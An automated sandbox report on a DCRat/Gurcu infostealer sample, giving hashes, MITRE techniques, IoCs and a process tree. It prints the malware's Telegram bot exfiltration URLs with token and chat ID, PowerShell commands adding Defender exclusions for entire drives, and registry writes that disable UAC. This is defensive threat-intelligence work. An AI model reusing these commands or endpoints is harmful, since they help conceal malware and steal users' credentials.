dcrat | 70f2953bdc5ac694ceb612a18354d624b5482b38a3cfed67e61fc90b6c7f4bb8

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
11-09-2024 21:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DCRatBuild.exe
Size

4.9MB
MD5

10a32fe9b9bde1619fe90f44f33e83d7
SHA1

18925c3452f9a25e131bc0bde7b9476e58a651d6
SHA256

70f2953bdc5ac694ceb612a18354d624b5482b38a3cfed67e61fc90b6c7f4bb8
SHA512

efda18a6a874d2b2b1cec129ad84199485b7910c210eabf0c1c0f015114e7f1baf2aeb0a41cbe2eafb3e8af4db2b9d4cb7afad6f908d7db74ef6a3c6133aee58
SSDEEP

98304:ubo+lbwHPjVTRjInqy49tnouxcWJGTlhIfWNK7XdBoQ0emBUGW:uHlbwrxRjIq1JxcW4TDIfWNcdBfmWGW

Score

10^/10

dcrat gurcu credential_access discovery evasion execution infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot7270981715:AAF4Nhu71Hf548vFJ0h0Xyvg4NGgEExI-NU/sendPhoto?chat_id=7450750733&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%205a7a8bf7fe711539e9b86ea23a057b5824572be3%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20KVIWLPUJ%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CAll%20Users%5CTextInputHost.ex

https://api.telegram.org/bot7270981715:AAF4Nhu71Hf548vFJ0h0Xyvg4NGgEExI-NU/sendDocument?chat_id=7450750733&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%205a7a8bf7fe711539e9b86ea23a057b5824572be3%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A01.979380

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Process spawned unexpected child process 30 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	212	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5108	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1400	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1640	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2596	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3280	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3332	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3792	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1292	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3112	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	748	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2652	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1068	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3672	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3552	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2264	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	344	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	740	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2128	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3340	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1944	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1232	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3088	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2756	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	224	2084	schtasks.exe	91
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1056	2084	schtasks.exe	91

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	TextInputHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	TextInputHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	TextInputHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	tempcache.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	tempcache.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	tempcache.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023451-10.dat	dcrat
behavioral2/memory/4772-13-0x0000000000570000-0x0000000000A14000-memory.dmp	dcrat
behavioral2/files/0x0009000000023478-76.dat	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5072	powershell.exe
4400	powershell.exe
4488	powershell.exe
2800	powershell.exe
3692	powershell.exe
2168	powershell.exe
1852	powershell.exe
1716	powershell.exe
2916	powershell.exe
3372	powershell.exe
4832	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	tempcache.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	TextInputHost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	DCRatBuild.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
4772	tempcache.exe
3492	TextInputHost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	tempcache.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	tempcache.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	TextInputHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	TextInputHost.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com
30	ipinfo.io
33	ipinfo.io

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\sihost.exe	tempcache.exe
File opened for modification	C:\Program Files\Common Files\System\uk-UA\Registry.exe	tempcache.exe
File opened for modification	C:\Program Files\Windows Multimedia Platform\RCXA6E4.tmp	tempcache.exe
File created	C:\Program Files\Common Files\System\uk-UA\Registry.exe	tempcache.exe
File created	C:\Program Files\Common Files\System\uk-UA\ee2ad38f3d4382	tempcache.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe	tempcache.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\RCXAD8E.tmp	tempcache.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\unsecapp.exe	tempcache.exe
File created	C:\Program Files\Windows Multimedia Platform\27d1bcfc3c54e0	tempcache.exe
File created	C:\Program Files\Google\Chrome\Application\66fc9ff0ee96c2	tempcache.exe
File opened for modification	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\RCXA2BB.tmp	tempcache.exe
File opened for modification	C:\Program Files\Windows Multimedia Platform\System.exe	tempcache.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\sihost.exe	tempcache.exe
File created	C:\Program Files\Windows Multimedia Platform\System.exe	tempcache.exe
File opened for modification	C:\Program Files\Common Files\System\uk-UA\RCXA4CF.tmp	tempcache.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\29c1c3cc0f7685	tempcache.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SystemResources\Windows.UI.Cred\pris\StartMenuExperienceHost.exe	tempcache.exe
File created	C:\Windows\SystemResources\Windows.UI.Cred\pris\55b276f4edf653	tempcache.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.Cred\pris\RCXA0B6.tmp	tempcache.exe
File opened for modification	C:\Windows\SystemResources\Windows.UI.Cred\pris\StartMenuExperienceHost.exe	tempcache.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DCRatBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	DCRatBuild.exe
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	TextInputHost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 30 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5108	schtasks.exe
3332	schtasks.exe
2652	schtasks.exe
3552	schtasks.exe
3672	schtasks.exe
2128	schtasks.exe
1232	schtasks.exe
2632	schtasks.exe
3280	schtasks.exe
3792	schtasks.exe
748	schtasks.exe
1964	schtasks.exe
1944	schtasks.exe
1400	schtasks.exe
3152	schtasks.exe
2596	schtasks.exe
212	schtasks.exe
436	schtasks.exe
1068	schtasks.exe
344	schtasks.exe
3340	schtasks.exe
224	schtasks.exe
1056	schtasks.exe
1640	schtasks.exe
740	schtasks.exe
3088	schtasks.exe
1292	schtasks.exe
2264	schtasks.exe
2756	schtasks.exe
3112	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
4772	tempcache.exe
2916	powershell.exe
2916	powershell.exe
4488	powershell.exe
4488	powershell.exe
1852	powershell.exe
1852	powershell.exe
4400	powershell.exe
4400	powershell.exe
2168	powershell.exe
2168	powershell.exe
1716	powershell.exe
1716	powershell.exe
3692	powershell.exe
3692	powershell.exe
4832	powershell.exe
4832	powershell.exe
5072	powershell.exe
5072	powershell.exe
3372	powershell.exe
3372	powershell.exe
2800	powershell.exe
2800	powershell.exe
5072	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3492	TextInputHost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	4772	tempcache.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	4832	powershell.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	3492	TextInputHost.exe
Token: SeBackupPrivilege	4844	vssvc.exe
Token: SeRestorePrivilege	4844	vssvc.exe
Token: SeAuditPrivilege	4844	vssvc.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe
4944	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1124 wrote to memory of 2916	1124	DCRatBuild.exe	85
PID 1124 wrote to memory of 2916	1124	DCRatBuild.exe	85
PID 1124 wrote to memory of 2916	1124	DCRatBuild.exe	85
PID 2916 wrote to memory of 768	2916	WScript.exe	87
PID 2916 wrote to memory of 768	2916	WScript.exe	87
PID 2916 wrote to memory of 768	2916	WScript.exe	87
PID 768 wrote to memory of 4772	768	cmd.exe	90
PID 768 wrote to memory of 4772	768	cmd.exe	90
PID 4772 wrote to memory of 1852	4772	tempcache.exe	125
PID 4772 wrote to memory of 1852	4772	tempcache.exe	125
PID 4772 wrote to memory of 1716	4772	tempcache.exe	126
PID 4772 wrote to memory of 1716	4772	tempcache.exe	126
PID 4772 wrote to memory of 5072	4772	tempcache.exe	127
PID 4772 wrote to memory of 5072	4772	tempcache.exe	127
PID 4772 wrote to memory of 4400	4772	tempcache.exe	128
PID 4772 wrote to memory of 4400	4772	tempcache.exe	128
PID 4772 wrote to memory of 4488	4772	tempcache.exe	129
PID 4772 wrote to memory of 4488	4772	tempcache.exe	129
PID 4772 wrote to memory of 2916	4772	tempcache.exe	130
PID 4772 wrote to memory of 2916	4772	tempcache.exe	130
PID 4772 wrote to memory of 2800	4772	tempcache.exe	131
PID 4772 wrote to memory of 2800	4772	tempcache.exe	131
PID 4772 wrote to memory of 3692	4772	tempcache.exe	132
PID 4772 wrote to memory of 3692	4772	tempcache.exe	132
PID 4772 wrote to memory of 3372	4772	tempcache.exe	133
PID 4772 wrote to memory of 3372	4772	tempcache.exe	133
PID 4772 wrote to memory of 4832	4772	tempcache.exe	134
PID 4772 wrote to memory of 4832	4772	tempcache.exe	134
PID 4772 wrote to memory of 2168	4772	tempcache.exe	135
PID 4772 wrote to memory of 2168	4772	tempcache.exe	135
PID 4772 wrote to memory of 3492	4772	tempcache.exe	147
PID 4772 wrote to memory of 3492	4772	tempcache.exe	147
PID 3492 wrote to memory of 2296	3492	TextInputHost.exe	149
PID 3492 wrote to memory of 2296	3492	TextInputHost.exe	149
PID 3492 wrote to memory of 636	3492	TextInputHost.exe	150
PID 3492 wrote to memory of 636	3492	TextInputHost.exe	150
PID 3492 wrote to memory of 4944	3492	TextInputHost.exe	159
PID 3492 wrote to memory of 4944	3492	TextInputHost.exe	159
PID 4944 wrote to memory of 344	4944	msedge.exe	160
PID 4944 wrote to memory of 344	4944	msedge.exe	160
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161
PID 4944 wrote to memory of 4400	4944	msedge.exe	161

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	TextInputHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	tempcache.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	tempcache.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	tempcache.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	TextInputHost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	TextInputHost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\appdatacache\f7dEioSun.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\appdatacache\dCFBsC1L6qM.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Users\Admin\AppData\Roaming\appdatacache\tempcache.exe
      "C:\Users\Admin\AppData\Roaming\appdatacache\tempcache.exe"
      4⤵
      UAC bypass
      Checks computer location settings
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in Program Files directory
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:4772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4488
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2800
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3372
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
    - - C:\Users\All Users\TextInputHost.exe
        
        "C:\Users\All Users\TextInputHost.exe"
        5⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:3492
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5c387a69-95a7-4bae-8147-c492ed54406d.vbs"
        6⤵
        
        PID:2296
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\156d791f-d957-410f-8431-07fe2f671013.vbs"
        6⤵
        
        PID:636
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://localhost:13372/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4944
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd92e346f8,0x7ffd92e34708,0x7ffd92e34718
        7⤵
        
        PID:344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
